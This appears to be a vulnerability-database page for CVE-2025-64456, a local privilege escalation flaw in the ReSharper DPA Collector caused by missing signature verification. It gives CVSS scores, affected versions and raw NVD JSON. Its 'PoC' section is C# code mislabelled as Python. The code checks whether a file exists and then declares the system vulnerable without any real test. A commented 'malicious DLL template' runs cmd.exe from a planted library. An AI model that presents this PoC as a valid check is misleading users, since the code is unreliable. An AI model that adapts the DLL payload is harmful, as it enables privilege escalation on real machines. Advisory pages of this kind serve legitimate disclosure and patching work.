Security Vulnerability Report
中文
CVE-2025-64456 CVSS 8.4 HIGH

CVE-2025-64456

Published: 2025-11-10 14:15:43
Last Modified: 2025-11-20 19:56:27
Source: [email protected]

Description

In JetBrains ReSharper before 2025.2.4 missing signature verification in DPA Collector allows local privilege escalation

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:jetbrains:resharper:*:*:*:*:*:*:*:* - VULNERABLE
JetBrains ReSharper < 2025.2.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-64456 PoC - JetBrains ReSharper DPA Collector Signature Verification Bypass // This PoC demonstrates the signature verification bypass in DPA Collector // Note: This is for educational and security research purposes only using System; using System.IO; using System.Diagnostics; namespace CVE_2025_64456_PoC { class Program { static void Main(string[] args) { Console.WriteLine("[*] CVE-2025-64456 PoC - ReSharper DPA Collector Signature Bypass"); Console.WriteLine("[*] Target: JetBrains ReSharper < 2025.2.4"); // Step 1: Identify ReSharper installation path string reSharperPath = Path.Combine( Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "JetBrains", "ReSharper", "vAny", "Packages" ); Console.WriteLine("[*] ReSharper path: " + reSharperPath); // Step 2: Identify DPA Collector component location string dpaCollectorPath = Path.Combine(reSharperPath, "DPACollector.dll"); if (File.Exists(dpaCollectorPath)) { Console.WriteLine("[+] DPA Collector found: " + dpaCollectorPath); // Step 3: Check if signature verification is performed // In vulnerable versions, this check is missing var fileInfo = new FileInfo(dpaCollectorPath); Console.WriteLine("[*] File size: " + fileInfo.Length + " bytes"); Console.WriteLine("[*] Last modified: " + fileInfo.LastWriteTime); // Step 4: Demonstrate the vulnerability Console.WriteLine("[!] VULNERABLE: No signature verification on DPA Collector"); Console.WriteLine("[!] Malicious DLL can be loaded without validation"); // Step 5: Show attack scenario Console.WriteLine("\n[*] Attack Scenario:"); Console.WriteLine(" 1. Attacker places malicious DLL in DPA Collector path"); Console.WriteLine(" 2. ReSharper loads the DLL without signature check"); Console.WriteLine(" 3. Malicious code executes with ReSharper privileges"); Console.WriteLine(" 4. Privilege escalation achieved"); } else { Console.WriteLine("[-] DPA Collector not found at expected location"); } Console.WriteLine("\n[*] Mitigation: Upgrade to ReSharper 2025.2.4 or later"); } } } // Malicious DLL template (for research purposes only) /* using System; using System.Security.Principal; using System.Diagnostics; public class MaliciousDPA { static MaliciousDPA() { // Privilege escalation payload try { WindowsIdentity wi = WindowsIdentity.GetCurrent(); WindowsPrincipal wp = new WindowsPrincipal(wi); // Log current user context Console.WriteLine("Current User: " + wi.Name); Console.WriteLine("Is Admin: " + wp.IsInRole(WindowsBuiltInRole.Administrator)); // Execute privileged operation Process.Start(new ProcessStartInfo("cmd.exe", "/c whoami > C:\\temp\\poc_result.txt") { UseShellExecute = false, RedirectStandardOutput = true, CreateNoWindow = true }); } catch (Exception ex) { Console.WriteLine("Error: " + ex.Message); } } } */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64456", "sourceIdentifier": "[email protected]", "published": "2025-11-10T14:15:43.083", "lastModified": "2025-11-20T19:56:27.110", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In JetBrains ReSharper before 2025.2.4 missing signature verification in DPA Collector allows local privilege escalation"}, {"lang": "es", "value": "En JetBrains ReSharper antes de 2025.2.4, la falta de verificación de firma en DPA Collector permite la escalada de privilegios local."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 5.8}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-347"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jetbrains:resharper:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025.2.4", "matchCriteriaId": "CE78C14C-6BDA-4DE9-982B-907BFC877DEA"}]}]}], "references": [{"url": "https://www.jetbrains.com/privacy-security/issues-fixed/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.